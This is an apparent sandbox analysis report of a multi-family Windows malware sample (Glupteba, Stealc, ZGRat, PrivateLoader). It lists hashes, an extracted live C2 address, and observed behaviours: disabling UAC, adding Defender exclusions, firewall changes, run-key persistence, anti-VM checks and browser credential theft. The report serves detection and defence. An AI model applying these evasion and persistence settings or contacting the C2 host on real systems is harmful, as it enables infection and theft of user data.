glupteba | 18d62aa8d04103058203e75fe4039dadb80eb0927ddd23b14f89c984f28aea97

Analysis

max time kernel
299s
max time network
301s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
06-05-2024 04:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

18d62aa8d04103058203e75fe4039dadb80eb0927ddd23b14f89c984f28aea97.exe
Size

390KB
MD5

18b50c6016cd5d7ff2f01b71a5e3373b
SHA1

d62dc0a84e39a1fff24163153761c62a55ff30fe
SHA256

18d62aa8d04103058203e75fe4039dadb80eb0927ddd23b14f89c984f28aea97
SHA512

27e0017fa30a9322e71191b2c4954d1f55d8fe827f029092fa3bdd6a52e799bbb671a776c3596a1df02d8ebe660b2192f293cb67252ec289bbc99a8725ceaa19
SSDEEP

6144:LlEGEyWKpTlDB878Ed8nFO+tFXFBCorNVDq5GZJrtLK7BYY0g2wqS5e8x:KGEyWERrpdTjZDqeh2Beg28Tx

Score

10^/10

glupteba privateloader stealc zgrat discovery dropper evasion execution loader persistence rat rootkit spyware stealer themida trojan

Malware Config

Extracted

Family

stealc

http://185.172.128.150

Attributes

url_path
/c698e1bc8a2f5e6d.php

Signatures

Detect ZGRat V1 3 IoCs

resource	yara_rule
behavioral2/memory/6892-2369-0x0000023FC9630000-0x0000023FCCF28000-memory.dmp	family_zgrat_v1
behavioral2/memory/6892-2404-0x0000023FCEDD0000-0x0000023FCEDF4000-memory.dmp	family_zgrat_v1
behavioral2/memory/6892-2400-0x0000023FE7780000-0x0000023FE7890000-memory.dmp	family_zgrat_v1

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 21 IoCs

resource	yara_rule
behavioral2/memory/2736-1275-0x0000000000400000-0x0000000001DF2000-memory.dmp	family_glupteba
behavioral2/memory/2304-1277-0x0000000000400000-0x0000000001DF2000-memory.dmp	family_glupteba
behavioral2/memory/4752-1278-0x0000000000400000-0x0000000001DF2000-memory.dmp	family_glupteba
behavioral2/memory/1356-1281-0x0000000000400000-0x0000000001DF2000-memory.dmp	family_glupteba
behavioral2/memory/5152-2339-0x0000000000400000-0x0000000001DF2000-memory.dmp	family_glupteba
behavioral2/memory/5132-2340-0x0000000000400000-0x0000000001DF2000-memory.dmp	family_glupteba
behavioral2/memory/5208-2342-0x0000000000400000-0x0000000001DF2000-memory.dmp	family_glupteba
behavioral2/memory/5220-2341-0x0000000000400000-0x0000000001DF2000-memory.dmp	family_glupteba
behavioral2/memory/5132-2911-0x0000000000400000-0x0000000001DF2000-memory.dmp	family_glupteba
behavioral2/memory/5208-2913-0x0000000000400000-0x0000000001DF2000-memory.dmp	family_glupteba
behavioral2/memory/5220-2912-0x0000000000400000-0x0000000001DF2000-memory.dmp	family_glupteba
behavioral2/memory/5152-2910-0x0000000000400000-0x0000000001DF2000-memory.dmp	family_glupteba
behavioral2/memory/5132-3669-0x0000000000400000-0x0000000001DF2000-memory.dmp	family_glupteba
behavioral2/memory/5152-4598-0x0000000000400000-0x0000000001DF2000-memory.dmp	family_glupteba
behavioral2/memory/5208-4699-0x0000000000400000-0x0000000001DF2000-memory.dmp	family_glupteba
behavioral2/memory/5152-4700-0x0000000000400000-0x0000000001DF2000-memory.dmp	family_glupteba
behavioral2/memory/5220-4698-0x0000000000400000-0x0000000001DF2000-memory.dmp	family_glupteba
behavioral2/memory/1512-5003-0x0000000000400000-0x0000000001DF2000-memory.dmp	family_glupteba
behavioral2/memory/5208-4600-0x0000000000400000-0x0000000001DF2000-memory.dmp	family_glupteba
behavioral2/memory/5220-4599-0x0000000000400000-0x0000000001DF2000-memory.dmp	family_glupteba
behavioral2/memory/1512-5266-0x0000000000400000-0x0000000001DF2000-memory.dmp	family_glupteba

Modifies firewall policy service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	xEXmzcXoDuSVy5Lb18Lv0n45.exe

PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
Stealc
Stealc is an infostealer written in C++.
stealer stealc

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	18d62aa8d04103058203e75fe4039dadb80eb0927ddd23b14f89c984f28aea97.exe

Windows security bypass 2 TTPs 10 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	Z7gEesF5i729dkMqNVYOlP1M.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Z7gEesF5i729dkMqNVYOlP1M.exe = "0"	Z7gEesF5i729dkMqNVYOlP1M.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\kubHbUH22R5cJMfEfeEVON21.exe = "0"	kubHbUH22R5cJMfEfeEVON21.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	Z7gEesF5i729dkMqNVYOlP1M.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	Z7gEesF5i729dkMqNVYOlP1M.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\wnoBQ6erADVdRUmpBaoc4kJO.exe = "0"	wnoBQ6erADVdRUmpBaoc4kJO.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\xqFR9DclKTs7bU8XGwKY57e3.exe = "0"	xqFR9DclKTs7bU8XGwKY57e3.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	Z7gEesF5i729dkMqNVYOlP1M.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	Z7gEesF5i729dkMqNVYOlP1M.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	Z7gEesF5i729dkMqNVYOlP1M.exe

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	xEXmzcXoDuSVy5Lb18Lv0n45.exe

Blocklisted process makes network request 3 IoCs

flow	pid	Process
32	2476	u1c4.1.exe
38	2476	u1c4.1.exe
102	5764	rundll32.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 33 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1412	powershell.exe
6860	powershell.exe
6412	powershell.exe
6684	powershell.exe
6812	powershell.exe
6740	powershell.exe
2656	powershell.exe
2920	powershell.exe
5900	powershell.exe
6040	powershell.exe
6024	powershell.exe
6728	powershell.exe
6300	powershell.exe
6800	powershell.exe
828	powershell.exe
3040	powershell.exe
3688	powershell.exe
1484	powershell.exe
2428	powershell.exe
4196	powershell.exe
6044	powershell.exe
7012	powershell.exe
6464	powershell.exe
6900	powershell.exe
5932	powershell.EXE
4504	powershell.exe
6000	powershell.exe
6224	powershell.exe
6224	powershell.exe
5808	powershell.exe
6964	powershell.exe
5860	powershell.exe
6332	powershell.exe

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 4 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
6336	netsh.exe
6616	netsh.exe
6532	netsh.exe
6776	netsh.exe

Checks BIOS information in registry 2 TTPs 5 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	xEXmzcXoDuSVy5Lb18Lv0n45.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	xEXmzcXoDuSVy5Lb18Lv0n45.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\International\Geo\Nation	OQqdOxl.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\International\Geo\Nation	UlCYPbb.exe

Drops startup file 9 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hFAuQcV351UlJHese5D9jmFZ.bat	msbuild.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FZWiOmjDC748Xrv8IETfVoli.bat	msbuild.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Qtycuy1JJbi0E9DNnWTPs9cg.bat	msbuild.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FlyxZmpOjXIUgujw7teorMdc.bat	msbuild.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SX8J7neLdZYpddWjjZcqW81r.bat	msbuild.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bFkkycv0ML98hFCahXaK9rz2.bat	msbuild.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2WoendnW1kWWst45BLMaMbD1.bat	msbuild.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1mR9QW6KFUo5Z56bCbLpb5ks.bat	msbuild.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LGip75uKA05IOBL80zjt1ANq.bat	msbuild.exe

Executes dropped EXE 25 IoCs

pid	Process
1356	wnoBQ6erADVdRUmpBaoc4kJO.exe
4752	xqFR9DclKTs7bU8XGwKY57e3.exe
2736	kubHbUH22R5cJMfEfeEVON21.exe
1732	FMRHImqKyRfmTuFwEnMaRCJU.exe
2304	Z7gEesF5i729dkMqNVYOlP1M.exe
2808	u1c4.0.exe
2476	u1c4.1.exe
5316	xEXmzcXoDuSVy5Lb18Lv0n45.exe
5152	kubHbUH22R5cJMfEfeEVON21.exe
5132	Z7gEesF5i729dkMqNVYOlP1M.exe
5220	xqFR9DclKTs7bU8XGwKY57e3.exe
5208	wnoBQ6erADVdRUmpBaoc4kJO.exe
6028	oiy1vPScVPH1BoLNrDBhvei7.exe
1860	Install.exe
5428	Install.exe
7132	pHXp9sFtbCFKytTVgnLIFPpH.exe
6068	Install.exe
1512	csrss.exe
5064	Install.exe
2376	injector.exe
5752	windefender.exe
5776	windefender.exe
1480	UlCYPbb.exe
6524	OQqdOxl.exe
6592	dcb505dc2b9d8aac05f4ca0727f5eadb.exe

Loads dropped DLL 3 IoCs

pid	Process
2808	u1c4.0.exe
2808	u1c4.0.exe
5764	rundll32.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 5 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral2/files/0x000800000001ac08-1265.dat	themida
behavioral2/memory/5316-1266-0x0000000140000000-0x0000000140861000-memory.dmp	themida
behavioral2/memory/5316-1355-0x0000000140000000-0x0000000140861000-memory.dmp	themida
behavioral2/memory/5316-2909-0x0000000140000000-0x0000000140861000-memory.dmp	themida
behavioral2/memory/5316-4597-0x0000000140000000-0x0000000140861000-memory.dmp	themida

Windows security modification 2 TTPs 10 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	Z7gEesF5i729dkMqNVYOlP1M.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	Z7gEesF5i729dkMqNVYOlP1M.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	Z7gEesF5i729dkMqNVYOlP1M.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Z7gEesF5i729dkMqNVYOlP1M.exe = "0"	Z7gEesF5i729dkMqNVYOlP1M.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\xqFR9DclKTs7bU8XGwKY57e3.exe = "0"	xqFR9DclKTs7bU8XGwKY57e3.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	Z7gEesF5i729dkMqNVYOlP1M.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	Z7gEesF5i729dkMqNVYOlP1M.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	Z7gEesF5i729dkMqNVYOlP1M.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\wnoBQ6erADVdRUmpBaoc4kJO.exe = "0"	wnoBQ6erADVdRUmpBaoc4kJO.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\kubHbUH22R5cJMfEfeEVON21.exe = "0"	kubHbUH22R5cJMfEfeEVON21.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	Z7gEesF5i729dkMqNVYOlP1M.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	wnoBQ6erADVdRUmpBaoc4kJO.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	xqFR9DclKTs7bU8XGwKY57e3.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	kubHbUH22R5cJMfEfeEVON21.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	csrss.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 3 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	18d62aa8d04103058203e75fe4039dadb80eb0927ddd23b14f89c984f28aea97.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	18d62aa8d04103058203e75fe4039dadb80eb0927ddd23b14f89c984f28aea97.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	xEXmzcXoDuSVy5Lb18Lv0n45.exe

Drops Chrome extension 3 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json	OQqdOxl.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json	UlCYPbb.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json	UlCYPbb.exe

Drops desktop.ini file(s) 1 IoCs

description	ioc	Process
File opened for modification	C:\$RECYCLE.BIN\S-1-5-18\desktop.ini	Install.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
2	pastebin.com
3	pastebin.com

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
41	api.myip.com
42	api.myip.com
44	ipinfo.io
45	ipinfo.io

Manipulates WinMonFS driver. 1 IoCs

Roottkits write to WinMonFS to hide directories/files from being detected.

rootkit evasion

description	ioc	Process
File opened for modification	\??\WinMonFS	csrss.exe

Drops file in System32 directory 61 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	Install.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	rundll32.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_6E4381F77BE6F6EB436B295D285593C5	UlCYPbb.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	UlCYPbb.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	xEXmzcXoDuSVy5Lb18Lv0n45.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15	UlCYPbb.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	UlCYPbb.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	xEXmzcXoDuSVy5Lb18Lv0n45.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	UlCYPbb.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	UlCYPbb.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	UlCYPbb.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	OQqdOxl.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_C66311BFC31F329FE5E6FBB46563B719	UlCYPbb.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	UlCYPbb.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	UlCYPbb.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15	UlCYPbb.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	UlCYPbb.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	UlCYPbb.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_C66311BFC31F329FE5E6FBB46563B719	UlCYPbb.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	UlCYPbb.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	UlCYPbb.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	UlCYPbb.exe
File opened for modification	C:\Windows\System32\GroupPolicy	xEXmzcXoDuSVy5Lb18Lv0n45.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	UlCYPbb.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_672E22BF4DD6902F7F85F941E23571DA	UlCYPbb.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	UlCYPbb.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	UlCYPbb.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	xEXmzcXoDuSVy5Lb18Lv0n45.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	UlCYPbb.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	OQqdOxl.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	UlCYPbb.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_672E22BF4DD6902F7F85F941E23571DA	UlCYPbb.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_6E4381F77BE6F6EB436B295D285593C5	UlCYPbb.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	UlCYPbb.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
5316	xEXmzcXoDuSVy5Lb18Lv0n45.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4448 set thread context of 4648	4448	18d62aa8d04103058203e75fe4039dadb80eb0927ddd23b14f89c984f28aea97.exe	75

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 4 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	Z7gEesF5i729dkMqNVYOlP1M.exe
File opened (read-only)	\??\VBoxMiniRdrDN	xqFR9DclKTs7bU8XGwKY57e3.exe
File opened (read-only)	\??\VBoxMiniRdrDN	wnoBQ6erADVdRUmpBaoc4kJO.exe
File opened (read-only)	\??\VBoxMiniRdrDN	kubHbUH22R5cJMfEfeEVON21.exe

Drops file in Program Files directory 25 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\mWJfrhglotUn\dQbMtOo.dll	OQqdOxl.exe
File created	C:\Program Files (x86)\DQANlvmTAvZU2\PTnQZsL.xml	UlCYPbb.exe
File created	C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\fVASxsu.dll	UlCYPbb.exe
File created	C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\DEoCyRj.xml	UlCYPbb.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	OQqdOxl.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	UlCYPbb.exe
